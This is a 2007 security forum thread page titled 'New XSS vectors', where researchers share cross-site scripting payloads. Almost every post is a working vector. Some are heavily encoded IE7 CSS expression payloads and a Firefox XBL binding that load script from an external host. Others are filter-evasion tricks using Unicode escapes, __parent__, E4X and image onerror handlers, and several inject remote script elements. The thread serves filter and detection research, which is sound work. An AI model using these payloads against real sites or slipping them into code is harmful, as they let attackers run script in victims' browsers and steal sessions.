Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 3 of 16
Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 26, 2007 08:07AM

Why w3? Why w3?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 26, 2007 08:08AM

This works on IE7:-

<div id="inject"></div>
<div style="xx: &#x65&#x78&#x70&#x72&#x65&#x73&#x73&#x69&#x6F&#x6E&#x28&#x28&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x27&#x29&#x20&#x3A&#x20&#x31&#x29&#x3B">test</div>

It encodes a vector originally done by Martin, brilliant work btw man!
http://the-mice.co.uk/switch/?p=39

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 26, 2007 08:34AM

A combined Firefox and IE7 example:-

<div id="inject"></div>
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x27&#x29 : 1);">test</div>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Anonymous User
Date: November 26, 2007 09:34AM

XBL wherever I look... time for something new: Filters :)
Today's haiku:


exploring the world
eyes wide open
with blurry glasses


<img src=_
onerror="
this.style.filter=
'progid:DXImageTransform.Microsoft.Compositor(function=2)';
this.filters.item('DXImageTransform.Microsoft.Compositor').
Function=alert(1);
">





Edited 1 time(s). Last edit at 12/01/2007 04:01PM by .mario.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 26, 2007 09:36AM

XBL and expressions :P

Seriously though, top work man!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Martin
Date: November 27, 2007 08:44AM

Glad you liked it Gareth :) The main problem was getting IE to not go into its stupid bloody loop, which the window.r trick nicely avoids. Also really nice work integrating that into Hackvertor - really useful, as my patience with encoding things manually is fast wearing thin!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS



Edited 1 time(s). Last edit at 11/27/2007 08:44AM by Martin.

Re: New XSS vectors
Posted by: sirdarckcat
Date: November 27, 2007 07:23PM

I was doing some code for backframe intervals, and I started playing with the JSON stuff..

with(document)with(body)appendChild(createElement(Script.name)).src=String(/http:/+/www.x.se/+/xm8#/).slice(1);

I didn't know about Script.name, and well, the URLs inside regexes: I was trying to get something without string manipulation, as..

/\//+/www.x.se/+/xm8#/

but that doesn't work :(

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 11/27/2007 07:28PM by sirdarckcat.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 28, 2007 03:33AM

@sdc

Cool idea!

Strings can also be created using [] like this:-
String(/http:/+/www.x.se/+(/x/+[])[1]+(/m/+[])[1]+(/8/+[])[1]+(/#/+[])[1]).slice(1)

Not very pretty, I know, but useful if you can't use quotes.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 28, 2007 03:35AM

Martin Wrote:
-------------------------------------------------------
> Glad you liked it Gareth :) The main problem was
> getting IE to not go into its stupid bloody loop,
> which the window.r trick nicely avoids. Also
> really nice work integrating that into Hackvertor
> - really useful as my patience with encoding
> things manually is fast wearing thin!

Yeah, your code was good; glad you don't mind me using it. I added it to Hackvertor for the same reason :) I'm gonna keep adding stuff like this because it saves time. I know we can all write a quick script to create these vectors, but it's nice to have it all in one place.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Anonymous User
Date: November 29, 2007 06:28AM

Today's haiku:


What is not known
can be found out
If tried twice


undefined='alert(1)';
eval(eval(typeof a))



I am slowly running out of stupid fantasy haikus ;)



Edited 2 time(s). Last edit at 12/01/2007 04:03PM by .mario.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 29, 2007 06:39AM

That actually works? lol, JavaScript is crazy

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Anonymous User
Date: November 29, 2007 06:57AM

/./.__parent__.alert('sure this works')


:)



Edited 1 time(s). Last edit at 11/29/2007 06:58AM by .mario.

Re: New XSS vectors
Posted by: sirdarckcat
Date: November 29, 2007 08:26AM

isn't undefined a reserved word in JavaScript?

pff awezome mario, awezome..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: New XSS vectors
Posted by: Anonymous User
Date: November 29, 2007 10:52AM

@Pei Mei DaKat:

yep - as well as NaN, Infinity and other stuff - but it's no problem to just overwrite them. Which kind of gives even new possibilities to create debugging frameworks in JS *g*

Re: New XSS vectors
Posted by: thornmaker
Date: November 29, 2007 11:58AM

good find .Shaolin Warrior

a slightly modified version of your last one: #0={}.__parent__.alert(0)



Edited 3 time(s). Last edit at 11/29/2007 12:22PM by thornmaker.

Re: New XSS vectors
Posted by: Anonymous User
Date: November 29, 2007 12:33PM

ah - sweet cyclic references ;)

http://developer.mozilla.org/en/docs/Sharp_variables_in_JavaScript

Re: New XSS vectors
Posted by: sirdarckcat
Date: November 29, 2007 03:14PM

var false=true doesn't work, but window.false=true does work; anyway, false is still false..

BTW, try this JavaScript Knowledge game :)
giorgio is the only person that passed it

http:/moltomio.heliohost.org/kuza55.php

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 11/29/2007 03:15PM by sirdarckcat.

Re: New XSS vectors
Posted by: Anonymous User
Date: November 30, 2007 03:27AM

Quote

giorgio is the only person that passed it

That's not exactly the truth ;)

Here's the solution (encoded to avoid spoiling):

Char(49),Char(54),Char(54),Char(32),Char(52),Char(49),Char(55),Char(101),
Char(56),Char(102),Char(49),Char(100),Char(32),Char(49),Char(55),Char(53),
Char(32),Char(34),Char(73),Char(102),Char(32),Char(121),Char(111),Char(117),
Char(32),Char(99),Char(97),Char(110),Char(32),Char(115),Char(101),Char(101),
Char(32),Char(116),Char(104),Char(105),Char(115),Char(44),Char(32),Char(121),
Char(111),Char(117),Char(32),Char(119),Char(105),Char(110),Char(32),Char(58),
Char(68),Char(34)

Greetings,
.mario

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 30, 2007 04:29AM

Do I pass?

x=eval(eval(eval(eval(eval))), alert(/1/</xmp><script>alert(1)</script><!--));x=eval(x)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Anonymous User
Date: November 30, 2007 08:19AM

Today's haiku:


Blocking
what could stand
alone

{with(0)alert(0)}

Re: New XSS vectors
Posted by: sirdarckcat
Date: November 30, 2007 09:39PM

.mario:
awezome, now we have 2 winners

Gareth:
yeah, it has an XSS vuln hehe :P.. but that's not the answer :(

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: New XSS vectors
Posted by: ma1
Date: December 01, 2007 05:12AM



beware who defends
he needs to be the supreme
master of offense



--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: New XSS vectors
Posted by: Anonymous User
Date: December 01, 2007 02:25PM

Thx ma1 ;)

Today's haiku:


The black pearl
lies hidden
inside the oyster's shell

Script(XML('<_>alert(1)</_>')[0].toString())()


More FFox JS peculiarities here:
http://groups.google.com/group/google-caja-discuss/browse_thread/thread/89cc50c9e936feb6

Greetings,
.mario



Edited 1 time(s). Last edit at 12/01/2007 04:03PM by .mario.

Re: New XSS vectors
Posted by: Anonymous User
Date: December 03, 2007 08:42AM

Today's haiku:


The waves
caress the beach
before they leave

~ 0 ; throw ~ this. alert( ~ 0)


Greetings,
.mario

Re: New XSS vectors
Posted by: Anonymous User
Date: December 03, 2007 11:29AM

Another one:


finding the sane
amongst the broke
might break yourself

<a<img/src/onerror=alert(1)//<

Re: New XSS vectors
Posted by: Anonymous User
Date: December 06, 2007 12:17PM

Long time no haiku - had some work with the PHPIDS to do :)


working ones way
deep to the core
but time still goes by

(Function('{}[top].__parent__.alert(1)')())




Edited 2 time(s). Last edit at 12/13/2007 11:01AM by .mario.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 08, 2007 04:44PM

Unicode can be used for function calls:-
\u0061lert(1)

:)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 09, 2007 04:34AM

even with new lines:-
alert\u000a(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 09, 2007 04:39AM

So alert
(1)

becomes:-
\u0061\u006c\u0065\u0072\u0074\u000a\u0028\u0031\u0029

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Anonymous User
Date: December 09, 2007 07:37AM

hey Gareth, I still can't visit your site anymore, is my IP blocked or something? it's been 3 days now...
